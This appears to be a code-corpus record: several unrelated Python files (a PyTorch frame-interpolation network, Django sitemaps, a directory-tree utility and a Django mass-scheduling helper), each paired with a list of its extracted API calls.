'(3)'}), '(version_url, headers=headers, allow_redirects=True, timeout=3)\n', (8906, 8969), False, 'import requests\n'), ((2810, 2840), 'logging.getLogger', 'logging.getLogger', (['"""srvlookup"""'], {}), "('srvlookup')\n", (2827, 2840), False, 'import logging\n'), ((9124, 9218), 'requests.get', 'requests.get', (['version_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(3)'}), '(version_url, headers=headers, allow_redirects=True, verify=\n False, timeout=3)\n', (9136, 9218), False, 'import requests\n')]
|
import os
import functools
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed as dist
from model.warp import backwarp, multiwarp, multimerge_flow
from model.refine import *
from model.setrans import SETransConfig, SelfAttVisPosTrans, print0
from model.forward_warp import fwarp_blob, fwarp_imgs
from model.losses import dual_teaching_loss
from model.raft.update import BasicUpdateBlock
from model.raft.extractor import BasicEncoder
from model.raft.corr import CorrBlock
local_rank = int(os.environ.get('LOCAL_RANK', 0))
try:
autocast = torch.cuda.amp.autocast
except:
# dummy autocast for PyTorch < 1.6
class autocast:
def __init__(self, enabled):
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def debug():
if local_rank == 0:
breakpoint()
else:
dist.barrier()
# https://discuss.pytorch.org/t/exluding-torch-clamp-from-backpropagation-as-tf-stop-gradient-in-tensorflow/52404/2
class Clamp01(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input.clamp(min=0, max=1)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
# Incorporate SOFI into RIFT.
# SOFI: Self-supervised optical flow through video frame interpolation.
class IFNet_RAFT(nn.Module):
def __init__(self, multi=(8,8,4), is_big_model=False, esti_sofi=False, num_sofi_loops=2):
super(IFNet_RAFT, self).__init__()
self.hidden_dim = hdim = 128
self.context_dim = cdim = 128
self.corr_levels = 4
self.corr_radius = 4
print("RAFT lookup radius: %d" %self.corr_radius)
if 'dropout' not in self.args:
self.args.dropout = 0
# feature network, context network, and update block
self.fnet = BasicEncoder(output_dim=256, norm_fn='instance', dropout=0)
self.cnet = BasicEncoder(output_dim=hdim+cdim, norm_fn='batch', dropout=0)
self.update_block = BasicUpdateBlock(self.args, hidden_dim=hdim)
# unet: 17 channels of input, 3 channels of output. Output is between 0 and 1.
self.unet = Unet()
self.esti_sofi = esti_sofi
if self.esti_sofi:
# nonimg_chans: 2 global mask scores (1 for each direction), 4 flow (2 for each direction).
self.block_sofi = IFBlock('block_sofi', c=block_widths[2], img_chans=6, nonimg_chans=6,
multi=self.Ms[2], global_mask_chans=2)
self.sofi_unet0 = SOFI_Unet()
self.sofi_unet1 = SOFI_Unet()
self.stopgrad_prob = 0
self.num_sofi_loops = num_sofi_loops
self.cut_sofi_loop_grad = False
else:
self.num_sofi_loops = 0
# Clamp with gradient works worse. Maybe when a value is clamped, that means it's an outlier?
self.use_clamp_with_grad = False
if self.use_clamp_with_grad:
clamp01_inst = Clamp01()
self.clamp = clamp01_inst.apply
else:
self.clamp = functools.partial(torch.clamp, min=0, max=1)
# scale_list: the scales to shrink the feature maps. scale_factor = 1. / scale_list[i]
# For evaluation on benchmark datasets, as only the middle frame is compared,
# we don't need to consider a flexible timestep here.
def forward(self, imgs, mid_gt, scale_list=[4,2,1], timestep=0.5):
img0 = imgs[:, :3]
img1 = imgs[:, 3:6]
# During inference, mid_gt is an empty tensor.
# If mid_gt is provided (in the training stage), then do distillation.
do_distillation = (mid_gt.shape[1] == 3)
img0_warped, img1_warped = None, None
stu_blocks = [self.block0, self.block1, self.block2]
loss_distill = 0
NS = len(scale_list)
# 3 scales of interpolation flow.
flow_list = [ None for _ in range(NS) ]
# 2 loops of sofi flow.
sofi_flow_list = [ None for _ in range(self.num_sofi_loops) ]
# 3 scales of backwarped middle frame (each scale has two images: warped img0 / img1).
warped_imgs_list = [ None for _ in range(NS) ]
mask_list = [ None for _ in range(NS) ]
# 3 scales of crude middle frame (merged from images warped in two directions) + warped img0 + warped img1.
crude_img_list = [ None for _ in range(NS + 2) ]
# 3 scales of estimated middle frame + reconstructed img0 + reconstructed img1
refined_img_list = [ None for _ in range(NS + 2) ]
for i in range(NS):
if i == 0:
imgs = torch.cat((img0, img1), 1)
global_mask_score = torch.zeros_like(img0[:, [0]])
flow_shape = list(img0.shape)
flow_shape[1] = 4
flow = torch.zeros(flow_shape, device=img0.device)
# flow = None
else:
# scale_list[i]: 1/4, 1/2, 1, i.e., from coarse to fine grained, and from smaller to larger images.
imgs = torch.cat((img0, img0_warped, img1, img1_warped), 1)
# flow: merged flow from multiflow of the previous iteration.
# multiflow_d: delta multiflow.
# multimask_score_d: score for delta multiflow (not delta score; score has no skip connection.)
# multiflow, multiflow_d: [16, 4*M, 224, 224]
# multimask_score, multimask_score_d: [16, 2*M+1, 224, 224]
# multiflow, multimask_score returned from an IFBlock is always of the size of the original image.
multiflow_d, multimask_score_d = stu_blocks[i](imgs, global_mask_score, flow, scale=scale_list[i])
if i == 0:
multiflow_skip = 0
else:
Mp = self.Ms[i-1]
Mc = self.Ms[i]
if Mp == Mc:
multiflow_skip = multiflow
elif Mp > Mc:
# Mp: M of the previous iteration. Mc: M of the current iteration.
# If multiflow from the previous iteration has more channels than the current iteration,
# only take the first Ms[i] channels (of each direction) as the residual.
multiflow_skip = torch.cat([ multiflow[:, :2*Mc], multiflow[:, 2*Mp:2*Mp+2*Mc] ], 1)
# Mp < Mc should never happen.
else:
debug()
multiflow = multiflow_skip + multiflow_d
# multimask_score of different layers have little correlations.
# No need to have residual connections.
multimask_score = multimask_score_d
global_mask_score = multimask_score[:, [-1]]
mask_list[i] = torch.sigmoid(global_mask_score)
# flow: single bi-flow merged from multiflow.
flow = multimerge_flow(multiflow, multimask_score, self.Ms[i])
flow_list[i] = flow
img0_warped, img1_warped = \
multiwarp(img0, img1, multiflow, multimask_score, self.Ms[i])
warped_imgs = (img0_warped, img1_warped)
warped_imgs_list[i] = warped_imgs
if do_distillation:
# multiflow and multimask_score are from block2,
# which always have the same M as the teacher.
multiflow_skip = multiflow
# teacher only works at the last scale, i.e., the full image.
# block_tea ~ block2, except that block_tea takes mid_gt (the middle frame) as extra input.
# block_tea input: torch.cat: [1, 13, 256, 448], flow: [1, 4, 256, 448].
# multiflow_d / multimask_score_d: flow / mask score difference
# between the teacher and the student (or residual of the teacher).
# The teacher only predicts the residual.
imgs = torch.cat((img0, img0_warped, img1, img1_warped), 1)
nonimg = torch.cat((global_mask_score, mid_gt), 1)
multiflow_tea_d, multimask_score_tea = self.block_tea(imgs, nonimg, flow, scale=1)
# Removing this residual connection makes the teacher perform much worse.
multiflow_tea = multiflow_skip + multiflow_tea_d
img0_warped_tea, img1_warped_tea = \
multiwarp(img0, img1, multiflow_tea, multimask_score_tea, self.Ms[NS-1])
global_mask_score_tea = multimask_score_tea[:, [-1]]
mask_tea = torch.sigmoid(global_mask_score_tea)
merged_tea = img0_warped_tea * mask_tea + img1_warped_tea * (1 - mask_tea)
flow_tea = multimerge_flow(multiflow_tea, multimask_score_tea, self.Ms[NS-1])
else:
flow_tea = None
merged_tea = None
for i in range(NS):
# mask_list[i]: *soft* mask (weights) at the i-th scale.
# crude_img_list[i]: average of 0.5->0 and 0.5->1 warped images.
crude_img_list[i] = warped_imgs_list[i][0] * mask_list[i] + \
warped_imgs_list[i][1] * (1 - mask_list[i])
if do_distillation:
# dual_teaching_loss: the student can also teach the teacher,
# when the student is more accurate.
# Distilling both merged flow and global mask score leads to slightly worse performance.
loss_distill += dual_teaching_loss(mid_gt,
crude_img_list[i], flow_list[i],
merged_tea, flow_tea,
)
M = self.Ms[-1]
# multiflow_m0, multiflow_m1: first/second half of multiflow.
# multimask_score_m0, multimask_score_m1: first/second half of multimask_score (except the global score).
multiflow_m0, multiflow_m1 = multiflow[:, :2*M], multiflow[:, 2*M:4*M]
multimask_score_m0, multimask_score_m1 = multimask_score[:, :M], multimask_score[:, M:2*M]
# Using dual warp reduces performance slightly.
sofi_do_dual_warp = False
if self.esti_sofi:
multiflow01_sofi, flow01, multimask_score01_sofi, global_mask_score01_sofi, \
multiflow10_sofi, flow10, multimask_score10_sofi, global_mask_score10_sofi \
= fwarp_blob(flow, multiflow, multimask_score, M)
multiflow_sofi = torch.cat([multiflow10_sofi, multiflow01_sofi], 1)
global_mask_score_sofi = torch.cat([global_mask_score10_sofi, global_mask_score01_sofi], 1)
# multimask_score_sofi is appended with global_mask_score_sofi,
# but note global_mask_score_sofi is bidirectional (2 channels).
# i.e., global_mask_score forward-warped to img0/img1, respectively.
# multimask_score_sofi here is only used in multimerge_flow(), where the global_mask_score_sofi is not used.
# They are concatenated to multimask_score_sofi just to have a consistent channel number with later loops,
# so as to pass the sanity check in multiwarp().
multimask_score_sofi = torch.cat([multimask_score10_sofi, multimask_score01_sofi, global_mask_score_sofi], 1)
flow_sofi = multimerge_flow(multiflow_sofi, multimask_score_sofi, M)
img0_bwarp_sofi, img1_bwarp_sofi = \
multiwarp(img0, img1, multiflow_sofi, multimask_score_sofi, M)
if sofi_do_dual_warp:
# img0_fw1 is img0 forward-warped by flow01, to approximate img1.
# img1_fw0 is img1 forward-warped by flow10, to approximate img0.
img0_fw1, img1_fw0 = fwarp_imgs(img0, img1, flow_sofi)
# img0_bwarp_sofi is img0 backward-warped by flow10, to approximate img1.
# both img0_fw1 and img0_bwarp_sofi are to approximate img1.
# Generate dual-warped images. No weights are available at the beginning,
# so assign a weight according to the intuition that backwarped images are usually better.
img0_warp = (img0_bwarp_sofi * 2 + img0_fw1) / 3
# img1_bwarp_sofi is img1 backward-warped by flow01, to approximate img0.
# img1_fw0 is img1 forward-warped by flow10, to approximate img0.
img1_warp = (img1_bwarp_sofi * 2 + img1_fw0) / 3
else:
img0_warp = img0_bwarp_sofi
img1_warp = img1_bwarp_sofi
for k in range(self.num_sofi_loops):
imgs = torch.cat((img0, img0_warp, img1, img1_warp), 1)
# multiflow_sofi_d: flow delta between the new multiflow_sofi and the old multiflow_sofi.
# the last two channels of multimask_score_sofi are global mask weights to indicate occlusions.
# So they are passed to sofi_unet().
multiflow_sofi_d, multimask_score_sofi = self.block_sofi(imgs, global_mask_score_sofi, flow_sofi, scale=scale_list[0])
# multiflow_sofi: refined flow (1->0, 0->1).
# In the first loop, stopgrad helps during early stages, but hurts during later stages,
# even if it's activated with a small probability like 0.3.
# So it's disabled by initializing stopgrad_prob=0.
# If cut_sofi_loop_grad, then in later loops (k>0), the gradient flow will be cut from the previously estimated flow.
# cut_sofi_loop_grad=True hurts performance, so disabled.
if k == 0 and (self.stopgrad_prob > 0 and torch.rand(1) < self.stopgrad_prob) \
or (k > 0 and self.cut_sofi_loop_grad):
multiflow_sofi = multiflow_sofi_d + multiflow_sofi.detach()
else:
multiflow_sofi = multiflow_sofi_d + multiflow_sofi
flow_sofi = multimerge_flow(multiflow_sofi, multimask_score_sofi, M)
sofi_flow_list[k] = flow_sofi
# The last two channels of multimask_score_sofi is unconstrained,
# which may pose some issues when used as input feature to block_sofi.
global_mask_score_sofi = multimask_score_sofi[:, -2:]
img0_bwarp_sofi, img1_bwarp_sofi = multiwarp(img0, img1, multiflow_sofi, multimask_score_sofi, M)
if sofi_do_dual_warp:
img0_fw1, img1_fw0 = fwarp_imgs(img0, img1, flow_sofi)
mask_sofi = torch.sigmoid(global_mask_score_sofi)
img0_warp = img0_bwarp_sofi * mask_sofi[:, [0]] + img0_fw1 * (1 - mask_sofi[:, [0]])
img1_warp = img1_bwarp_sofi * mask_sofi[:, [1]] + img1_fw0 * (1 - mask_sofi[:, [1]])
else:
img0_warp = img0_bwarp_sofi
img1_warp = img1_bwarp_sofi
multiflow10_sofi, multiflow01_sofi = multiflow_sofi[:, :2*M], multiflow_sofi[:, 2*M:4*M]
multimask_score10_sofi, multimask_score01_sofi = multimask_score_sofi[:, :M], multimask_score_sofi[:, M:2*M]
# flow_sofi: single bi-flow merged from multiflow_sofi.
else:
multiflow_sofi, multiflow10_sofi, multiflow01_sofi = None, None, None
multimask_score_sofi, multimask_score10_sofi, multimask_score01_sofi = None, None, None
# contextnet generates backwarped features of the input image.
# multimask_score* is used in multiwarp, i.e., first backwarp features according to multiflow*,
# then combine with multimask_score*.
# ctx0, ctx1: four level conv features of img0 and img1, gradually scaled down.
# If esti_sofi: ctx0_sofi, ctx1_sofi are contextual features backwarped
# by multiflow10_sofi and multiflow01_sofi, respectively.
# Otherwise, multiflow10_sofi, multimask_score10_sofi are None,
# and accordingly, ctx0_sofi, ctx1_sofi are None.
ctx0, ctx0_sofi = self.contextnet(img0, M, multiflow_m0, multimask_score_m0,
multiflow10_sofi, multimask_score10_sofi)
ctx1, ctx1_sofi = self.contextnet(img1, M, multiflow_m1, multimask_score_m1,
multiflow01_sofi, multimask_score01_sofi)
# After backwarping, ctx0/ctx1 are both aligned with the middle frame.
# After backwarping, ctx0_sofi is aligned with img1, and ctx1_sofi aligned with img0.
# unet is to refine the crude image crude_img_list[NS-1] with its output img_residual.
# flow: merged flow (of two directions) from multiflow computed in the last iteration.
img_residual = self.unet(img0, img1, img0_warped, img1_warped, global_mask_score, flow, ctx0, ctx1)
# unet activation function changes from softmax to tanh. No need to scale anymore.
refined_img = self.clamp(crude_img_list[NS - 1] + img_residual)
# refined_img_list[0~1] are always None, to make the indices consistent with crude_img_list.
refined_img_list[NS - 1] = refined_img
if self.esti_sofi:
# img0_warp is a crude version of img1, and is refined with img1_residual.
# img1_warp is a crude version of img0, and is refined with img0_residual.
flow10, flow01 = flow_sofi.split(2, dim=1)
global_mask_score10_sofi, global_mask_score01_sofi = global_mask_score_sofi.split(1, dim=1)
# flow01_align1: flow01 aligned to image1.
flow01_align1 = backwarp(flow01, flow10)
# flow10_align0: flow10 aligned to image0.
flow10_align0 = backwarp(flow10, flow01)
flow_sofi_align1 = torch.cat((flow10, flow01_align1), dim=1)
flow_sofi_align0 = torch.cat((flow10_align0, flow01), dim=1)
# flow_sofi extended with flow01 aligned to image1.
# flow_sofi_01a1 = torch.cat((flow_sofi, flow01_align1), dim=1)
# flow_sofi extended with flow10 aligned to image0.
# flow_sofi_10a0 = torch.cat((flow_sofi, flow10_align0), dim=1)
# flow_sofi_warp = torch.cat((flow_sofi, flow10_align0, flow01_align1), dim=1)
# After backwarping in contextnet(), ctx1_sofi is aligned with img0, and ctx0_sofi is aligned with img1.
# For img0_residual, try the best to align all input features with img0.
img0_residual = self.sofi_unet0(img1, img1_warp, global_mask_score01_sofi, flow_sofi_align0, ctx1_sofi)
# For img1_residual, try the best to align all input features with img1.
img1_residual = self.sofi_unet1(img0, img0_warp, global_mask_score10_sofi, flow_sofi_align1, ctx0_sofi)
# The order in crude_img_list and refined_img_list: img 0, img 1.
# img1_warp is to approximate img0, so it appears first.
crude_img_list[NS] = img1_warp
refined_img0 = self.clamp(img1_warp + img0_residual)
refined_img_list[NS] = refined_img0
# wapred img0 approximates img1.
crude_img_list[NS+1] = img0_warp
refined_img1 = self.clamp(img0_warp + img1_residual)
refined_img_list[NS + 1] = refined_img1
teacher_dict = { 'flow_teacher': flow_tea, 'merged_teacher': merged_tea }
# flow_list, mask_list: flow and mask in NS=3 different scales.
# If mid_gt is None, loss_distill = 0.
return flow_list, sofi_flow_list, mask_list[-1], crude_img_list, refined_img_list, teacher_dict, loss_distill
|
[
"functools.partial",
"model.losses.dual_teaching_loss",
"model.raft.update.BasicUpdateBlock",
"model.forward_warp.fwarp_blob",
"model.warp.multiwarp",
"torch.zeros_like",
"model.raft.extractor.BasicEncoder",
"torch.distributed.barrier",
"torch.cat",
"model.warp.backwarp",
"torch.zeros",
"os.environ.get",
"torch.sigmoid",
"model.forward_warp.fwarp_imgs",
"torch.rand",
"model.warp.multimerge_flow"
] |
[((530, 561), 'os.environ.get', 'os.environ.get', (['"""LOCAL_RANK"""', '(0)'], {}), "('LOCAL_RANK', 0)\n", (544, 561), False, 'import os\n'), ((904, 918), 'torch.distributed.barrier', 'dist.barrier', ([], {}), '()\n', (916, 918), True, 'import torch.distributed as dist\n'), ((1875, 1934), 'model.raft.extractor.BasicEncoder', 'BasicEncoder', ([], {'output_dim': '(256)', 'norm_fn': '"""instance"""', 'dropout': '(0)'}), "(output_dim=256, norm_fn='instance', dropout=0)\n", (1887, 1934), False, 'from model.raft.extractor import BasicEncoder\n'), ((1963, 2027), 'model.raft.extractor.BasicEncoder', 'BasicEncoder', ([], {'output_dim': '(hdim + cdim)', 'norm_fn': '"""batch"""', 'dropout': '(0)'}), "(output_dim=hdim + cdim, norm_fn='batch', dropout=0)\n", (1975, 2027), False, 'from model.raft.extractor import BasicEncoder\n'), ((2054, 2098), 'model.raft.update.BasicUpdateBlock', 'BasicUpdateBlock', (['self.args'], {'hidden_dim': 'hdim'}), '(self.args, hidden_dim=hdim)\n', (2070, 2098), False, 'from model.raft.update import BasicUpdateBlock\n'), ((3120, 3164), 'functools.partial', 'functools.partial', (['torch.clamp'], {'min': '(0)', 'max': '(1)'}), '(torch.clamp, min=0, max=1)\n', (3137, 3164), False, 'import functools\n'), ((6821, 6853), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score'], {}), '(global_mask_score)\n', (6834, 6853), False, 'import torch\n'), ((6932, 6987), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow', 'multimask_score', 'self.Ms[i]'], {}), '(multiflow, multimask_score, self.Ms[i])\n', (6947, 6987), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((7077, 7138), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow', 'multimask_score', 'self.Ms[i]'], {}), '(img0, img1, multiflow, multimask_score, self.Ms[i])\n', (7086, 7138), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((7925, 7977), 'torch.cat', 'torch.cat', (['(img0, img0_warped, img1, img1_warped)', '(1)'], {}), '((img0, img0_warped, img1, img1_warped), 1)\n', (7934, 7977), False, 'import torch\n'), ((7999, 8040), 'torch.cat', 'torch.cat', (['(global_mask_score, mid_gt)', '(1)'], {}), '((global_mask_score, mid_gt), 1)\n', (8008, 8040), False, 'import torch\n'), ((8371, 8445), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_tea', 'multimask_score_tea', 'self.Ms[NS - 1]'], {}), '(img0, img1, multiflow_tea, multimask_score_tea, self.Ms[NS - 1])\n', (8380, 8445), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((8532, 8568), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score_tea'], {}), '(global_mask_score_tea)\n', (8545, 8568), False, 'import torch\n'), ((8679, 8747), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_tea', 'multimask_score_tea', 'self.Ms[NS - 1]'], {}), '(multiflow_tea, multimask_score_tea, self.Ms[NS - 1])\n', (8694, 8747), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((10450, 10497), 'model.forward_warp.fwarp_blob', 'fwarp_blob', (['flow', 'multiflow', 'multimask_score', 'M'], {}), '(flow, multiflow, multimask_score, M)\n', (10460, 10497), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((10537, 10587), 'torch.cat', 'torch.cat', (['[multiflow10_sofi, multiflow01_sofi]', '(1)'], {}), '([multiflow10_sofi, multiflow01_sofi], 1)\n', (10546, 10587), False, 'import torch\n'), ((10635, 10701), 'torch.cat', 'torch.cat', (['[global_mask_score10_sofi, global_mask_score01_sofi]', '(1)'], {}), '([global_mask_score10_sofi, global_mask_score01_sofi], 1)\n', (10644, 10701), False, 'import torch\n'), ((11276, 11366), 'torch.cat', 'torch.cat', (['[multimask_score10_sofi, multimask_score01_sofi, global_mask_score_sofi]', '(1)'], {}), '([multimask_score10_sofi, multimask_score01_sofi,\n global_mask_score_sofi], 1)\n', (11285, 11366), False, 'import torch\n'), ((11401, 11457), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(multiflow_sofi, multimask_score_sofi, M)\n', (11416, 11457), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((11523, 11585), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(img0, img1, multiflow_sofi, multimask_score_sofi, M)\n', (11532, 11585), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17733, 17757), 'model.warp.backwarp', 'backwarp', (['flow01', 'flow10'], {}), '(flow01, flow10)\n', (17741, 17757), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17841, 17865), 'model.warp.backwarp', 'backwarp', (['flow10', 'flow01'], {}), '(flow10, flow01)\n', (17849, 17865), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17897, 17938), 'torch.cat', 'torch.cat', (['(flow10, flow01_align1)'], {'dim': '(1)'}), '((flow10, flow01_align1), dim=1)\n', (17906, 17938), False, 'import torch\n'), ((17970, 18011), 'torch.cat', 'torch.cat', (['(flow10_align0, flow01)'], {'dim': '(1)'}), '((flow10_align0, flow01), dim=1)\n', (17979, 18011), False, 'import torch\n'), ((4683, 4709), 'torch.cat', 'torch.cat', (['(img0, img1)', '(1)'], {}), '((img0, img1), 1)\n', (4692, 4709), False, 'import torch\n'), ((4746, 4776), 'torch.zeros_like', 'torch.zeros_like', (['img0[:, [0]]'], {}), '(img0[:, [0]])\n', (4762, 4776), False, 'import torch\n'), ((4880, 4923), 'torch.zeros', 'torch.zeros', (['flow_shape'], {'device': 'img0.device'}), '(flow_shape, device=img0.device)\n', (4891, 4923), False, 'import torch\n'), ((5111, 5163), 'torch.cat', 'torch.cat', (['(img0, img0_warped, img1, img1_warped)', '(1)'], {}), '((img0, img0_warped, img1, img1_warped), 1)\n', (5120, 5163), False, 'import torch\n'), ((9479, 9564), 'model.losses.dual_teaching_loss', 'dual_teaching_loss', (['mid_gt', 'crude_img_list[i]', 'flow_list[i]', 'merged_tea', 'flow_tea'], {}), '(mid_gt, crude_img_list[i], flow_list[i], merged_tea,\n flow_tea)\n', (9497, 9564), False, 'from model.losses import dual_teaching_loss\n'), ((11822, 11855), 'model.forward_warp.fwarp_imgs', 'fwarp_imgs', (['img0', 'img1', 'flow_sofi'], {}), '(img0, img1, flow_sofi)\n', (11832, 11855), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((12702, 12750), 'torch.cat', 'torch.cat', (['(img0, img0_warp, img1, img1_warp)', '(1)'], {}), '((img0, img0_warp, img1, img1_warp), 1)\n', (12711, 12750), False, 'import torch\n'), ((14030, 14086), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(multiflow_sofi, multimask_score_sofi, M)\n', (14045, 14086), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((14426, 14488), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(img0, img1, multiflow_sofi, multimask_score_sofi, M)\n', (14435, 14488), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((14569, 14602), 'model.forward_warp.fwarp_imgs', 'fwarp_imgs', (['img0', 'img1', 'flow_sofi'], {}), '(img0, img1, flow_sofi)\n', (14579, 14602), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((14635, 14672), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score_sofi'], {}), '(global_mask_score_sofi)\n', (14648, 14672), False, 'import torch\n'), ((6335, 6410), 'torch.cat', 'torch.cat', (['[multiflow[:, :2 * Mc], multiflow[:, 2 * Mp:2 * Mp + 2 * Mc]]', '(1)'], {}), '([multiflow[:, :2 * Mc], multiflow[:, 2 * Mp:2 * Mp + 2 * Mc]], 1)\n', (6344, 6410), False, 'import torch\n'), ((13733, 13746), 'torch.rand', 'torch.rand', (['(1)'], {}), '(1)\n', (13743, 13746), False, 'import torch\n')]
|
from django.contrib.sitemaps import Sitemap
from django.shortcuts import reverse
from .models import Article
class StaticViewSitemap(Sitemap):
def items(self):
return ["home", "articles"]
def location(self, item):
return reverse(item)
class ArticleSitemap(Sitemap):
def items(self):
return Article.objects.all()
def lastmod(self, obj):
return obj.created_on
|
[
"django.shortcuts.reverse"
] |
[((249, 262), 'django.shortcuts.reverse', 'reverse', (['item'], {}), '(item)\n', (256, 262), False, 'from django.shortcuts import reverse\n')]
|
from efdir import fs
from efdir import rstcfg
from efdir import jsoncfg
import os
#dlmktree mktree-from-dirs
#fmktree mktree-from-filecfg
def _cfgfile2pl(cfgfile):
suffix = os.path.splitext(cfgfile)[1]
if(suffix == ".rst"):
rst_str = fs.rfile(cfgfile)
dirs = rstcfg.get_dirs(rst_str)
elif(suffix == ".json"):
d = fs.rjson(cfgfile)
dirs = jsoncfg.get_dirs(d)
else:
print("error,must be .rst or .json")
return(dirs)
def _cfg2pl(cfg):
if(isinstance(cfg,str)):
dirs = rstcfg.get_dirs(cfg)
elif(isinstance(cfg,dict)):
dirs = jsoncfg.get_dirs(cfg)
else:
print("error,must be .rst or .json")
return(dirs)
def _creat_dir(dir,parent_dir,**kwargs):
if(os.path.exists(parent_dir)):
if(os.path.isdir(parent_dir)):
pass
else:
print(parent_dir+"exists,but is not a dir!!!")
else:
fs.mkdirs(parent_dir,**kwargs)
dirname = os.path.dirname(dir)
basename = os.path.basename(dir)
tail = basename[-1]
if(tail == "$"):
full = os.path.join(parent_dir,dirname,basename[:-1])
fs.mkdirs(os.path.join(parent_dir,dirname),**kwargs)
fs.touch(full)
else:
fs.mkdirs(os.path.join(parent_dir,dir),**kwargs)
def _dlmktree(dirs,parent_dir="./",**kwargs):
for i in range(dirs.__len__()):
_creat_dir(dirs[i],parent_dir,**kwargs)
def mktree(cfg,parent_dir="./",**kwargs):
dirs = _cfg2pl(cfg)
_dlmktree(dirs,parent_dir,**kwargs)
def fmktree(cfgfile,parent_dir="./",**kwargs):
dirs = _cfgfile2pl(cfgfile)
_dlmktree(dirs,parent_dir,**kwargs)
|
[
"efdir.jsoncfg.get_dirs",
"os.path.join",
"os.path.basename",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"efdir.fs.rjson",
"efdir.rstcfg.get_dirs",
"efdir.fs.touch",
"os.path.splitext",
"efdir.fs.mkdirs",
"efdir.fs.rfile"
] |
[((754, 780), 'os.path.exists', 'os.path.exists', (['parent_dir'], {}), '(parent_dir)\n', (768, 780), False, 'import os\n'), ((975, 995), 'os.path.dirname', 'os.path.dirname', (['dir'], {}), '(dir)\n', (990, 995), False, 'import os\n'), ((1011, 1032), 'os.path.basename', 'os.path.basename', (['dir'], {}), '(dir)\n', (1027, 1032), False, 'import os\n'), ((181, 206), 'os.path.splitext', 'os.path.splitext', (['cfgfile'], {}), '(cfgfile)\n', (197, 206), False, 'import os\n'), ((254, 271), 'efdir.fs.rfile', 'fs.rfile', (['cfgfile'], {}), '(cfgfile)\n', (262, 271), False, 'from efdir import fs\n'), ((287, 311), 'efdir.rstcfg.get_dirs', 'rstcfg.get_dirs', (['rst_str'], {}), '(rst_str)\n', (302, 311), False, 'from efdir import rstcfg\n'), ((542, 562), 'efdir.rstcfg.get_dirs', 'rstcfg.get_dirs', (['cfg'], {}), '(cfg)\n', (557, 562), False, 'from efdir import rstcfg\n'), ((794, 819), 'os.path.isdir', 'os.path.isdir', (['parent_dir'], {}), '(parent_dir)\n', (807, 819), False, 'import os\n'), ((930, 961), 'efdir.fs.mkdirs', 'fs.mkdirs', (['parent_dir'], {}), '(parent_dir, **kwargs)\n', (939, 961), False, 'from efdir import fs\n'), ((1093, 1141), 'os.path.join', 'os.path.join', (['parent_dir', 'dirname', 'basename[:-1]'], {}), '(parent_dir, dirname, basename[:-1])\n', (1105, 1141), False, 'import os\n'), ((1209, 1223), 'efdir.fs.touch', 'fs.touch', (['full'], {}), '(full)\n', (1217, 1223), False, 'from efdir import fs\n'), ((353, 370), 'efdir.fs.rjson', 'fs.rjson', (['cfgfile'], {}), '(cfgfile)\n', (361, 370), False, 'from efdir import fs\n'), ((386, 405), 'efdir.jsoncfg.get_dirs', 'jsoncfg.get_dirs', (['d'], {}), '(d)\n', (402, 405), False, 'from efdir import jsoncfg\n'), ((610, 631), 'efdir.jsoncfg.get_dirs', 'jsoncfg.get_dirs', (['cfg'], {}), '(cfg)\n', (626, 631), False, 'from efdir import jsoncfg\n'), ((1158, 1191), 'os.path.join', 'os.path.join', (['parent_dir', 'dirname'], {}), '(parent_dir, dirname)\n', (1170, 1191), False, 'import os\n'), ((1252, 1281), 'os.path.join', 'os.path.join', (['parent_dir', 'dir'], {}), '(parent_dir, dir)\n', (1264, 1281), False, 'import os\n')]
|
from typing import List
import numpy as np
Tensor = List[float]
def single_output(xdata: List[Tensor], ydata: List[Tensor]) -> List[Tensor]:
xdata = np.asarray(xdata)
ydata = np.asarray(ydata)
|
[
"numpy.asarray"
] |
[((155, 172), 'numpy.asarray', 'np.asarray', (['xdata'], {}), '(xdata)\n', (165, 172), True, 'import numpy as np\n'), ((185, 202), 'numpy.asarray', 'np.asarray', (['ydata'], {}), '(ydata)\n', (195, 202), True, 'import numpy as np\n')]
|
import pytz
from django.db import transaction
from django.utils import timezone
from messdiener.models import Mass, Type
@transaction.atomic
def delete_masses_without_type(plan_pk):
Mass.objects.filter(plan=plan_pk).filter(type__isnull=True).delete()
@transaction.atomic
def assign_types(plan_pk):
types = Type.objects.all()
masses = Mass.objects.filter(plan=plan_pk).all()
for mass in masses:
for type in types:
for rule in type.rules.all():
mass_local_time = convert_to_localtime(mass.time)
if int_to_day_of_week(mass.time.weekday()) == rule.dayOfWeek \
and mass_local_time.hour == rule.time.hour \
and mass_local_time.minute == rule.time.minute \
and mass.location_id == rule.location_id:
